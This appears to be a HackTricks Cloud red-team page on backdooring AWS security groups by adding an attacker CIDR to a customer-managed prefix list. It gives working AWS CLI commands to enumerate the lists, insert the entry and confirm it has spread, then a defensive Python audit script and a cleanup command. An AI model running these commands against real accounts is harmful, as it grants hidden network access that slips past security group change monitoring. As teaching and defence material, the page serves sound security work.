AWS - Security Group Backdoor via Managed Prefix Lists
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse customer-managed Prefix Lists to create a stealthy access path. If a security group (SG) rule references a managed Prefix List, anyone with the ability to modify that list can silently add attacker-controlled CIDRs. Every SG (and potentially Network ACL or VPC endpoint) that references the list immediately allows the new ranges without any visible SG change.
Impact
- Instant expansion of allowed IP ranges for all SGs referencing the prefix list, bypassing change controls that only monitor SG edits.
- Enables persistent ingress/egress backdoors: keep the malicious CIDR hidden in the prefix list while the SG rule appears unchanged.
Requirements
- IAM permissions: ec2:DescribeManagedPrefixLists, ec2:GetManagedPrefixListEntries, ec2:ModifyManagedPrefixList, and ec2:DescribeSecurityGroups / ec2:DescribeSecurityGroupRules (to identify attached SGs).
- Optional: ec2:CreateManagedPrefixList if creating a new one for testing.
- Environment: At least one SG rule referencing the target customer-managed Prefix List.
Variables
```bash
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"
```
Attack Steps
- Enumerate candidate prefix lists and consumers
```bash
aws ec2 describe-managed-prefix-lists \
  --region "$REGION" \
  --query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
  --output table

aws ec2 get-managed-prefix-list-entries \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --region "$REGION" \
  --query 'Entries[*].[Cidr,Description]'
```
Use aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID to confirm which SG rules rely on the list.
- Add attacker CIDR to the prefix list
```bash
aws ec2 modify-managed-prefix-list \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
  --region "$REGION"
```
- Validate propagation to security groups
```bash
aws ec2 describe-security-group-rules \
  --region "$REGION" \
  --filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
  --query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
  --output table
```
Traffic from $ENTRY_CIDR is now allowed wherever the prefix list is referenced (commonly outbound rules on egress proxies or inbound rules on shared services).
Evidence
- get-managed-prefix-list-entries reflects the attacker CIDR and description.
- describe-security-group-rules still shows the original SG rule referencing the prefix list (no SG modification recorded), yet traffic from the new CIDR succeeds.
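Because the SG rule itself never changes, a defender has to audit the prefix list entries against an approved baseline and map any drift back to the SG rules that reference the list. The following script does that offline over the JSON shapes returned by get-managed-prefix-list-entries and describe-security-group-rules; it is an added example, not part of the original page, and all ids, CIDRs and the baseline below are constructed.

```python
"""Audit a customer-managed prefix list against an approved CIDR baseline.

Added example (not from the original page). Inputs mirror the JSON output of
`aws ec2 get-managed-prefix-list-entries` and `aws ec2 describe-security-group-rules`;
every id and CIDR below is a constructed placeholder.
"""
import ipaddress
import json

# Constructed sample output of get-managed-prefix-list-entries.
PREFIX_LIST_ENTRIES = json.dumps({"Entries": [
    {"Cidr": "10.20.0.0/16", "Description": "corp-vpn"},
    {"Cidr": "198.51.100.7/32", "Description": "Backdoor - allow attacker"},
]})

# Constructed sample output of describe-security-group-rules (rules with a
# PrefixListId field are the ones that consume the list).
SG_RULES = json.dumps({"SecurityGroupRules": [
    {"SecurityGroupRuleId": "sgr-0aaa", "GroupId": "sg-0111", "IsEgress": False,
     "IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "PrefixListId": "pl-0abc"},
    {"SecurityGroupRuleId": "sgr-0bbb", "GroupId": "sg-0222", "IsEgress": True,
     "IpProtocol": "-1", "FromPort": -1, "ToPort": -1, "PrefixListId": "pl-0abc"},
    {"SecurityGroupRuleId": "sgr-0ccc", "GroupId": "sg-0333", "IsEgress": False,
     "IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIpv4": "10.0.0.0/8"},
]})

# Approved CIDRs per list; keep this in version control so drift is reviewable.
BASELINE = {"pl-0abc": {"10.20.0.0/16"}}


def audit_prefix_list(pl_id, entries_json, sg_rules_json, baseline):
    """Return entries not covered by the baseline plus the SG rules they now reach.

    An entry is approved if it equals, or is a subnet of, an approved CIDR.
    """
    approved = [ipaddress.ip_network(c) for c in baseline.get(pl_id, ())]
    entries = json.loads(entries_json)["Entries"]
    rules = json.loads(sg_rules_json)["SecurityGroupRules"]
    consumers = [r for r in rules if r.get("PrefixListId") == pl_id]
    findings = []
    for e in entries:
        net = ipaddress.ip_network(e["Cidr"])
        if any(net.version == a.version and net.subnet_of(a) for a in approved):
            continue
        findings.append({
            "cidr": e["Cidr"],
            "description": e.get("Description", ""),
            # Every rule referencing the list admits this CIDR with no SG edit logged.
            "exposed_rules": [(r["GroupId"], "egress" if r["IsEgress"] else "ingress",
                               r["IpProtocol"], r["FromPort"], r["ToPort"]) for r in consumers],
        })
    return findings


if __name__ == "__main__":
    for finding in audit_prefix_list("pl-0abc", PREFIX_LIST_ENTRIES, SG_RULES, BASELINE):
        print(finding)
```

In practice, feed it the real CLI output and a baseline file, and alert on any non-empty result; pair it with CloudTrail monitoring of ModifyManagedPrefixList, since SG-only change monitoring misses this path.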
Cleanup
```bash
aws ec2 modify-managed-prefix-list \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --remove-entries Cidr="$ENTRY_CIDR" \
  --region "$REGION"
```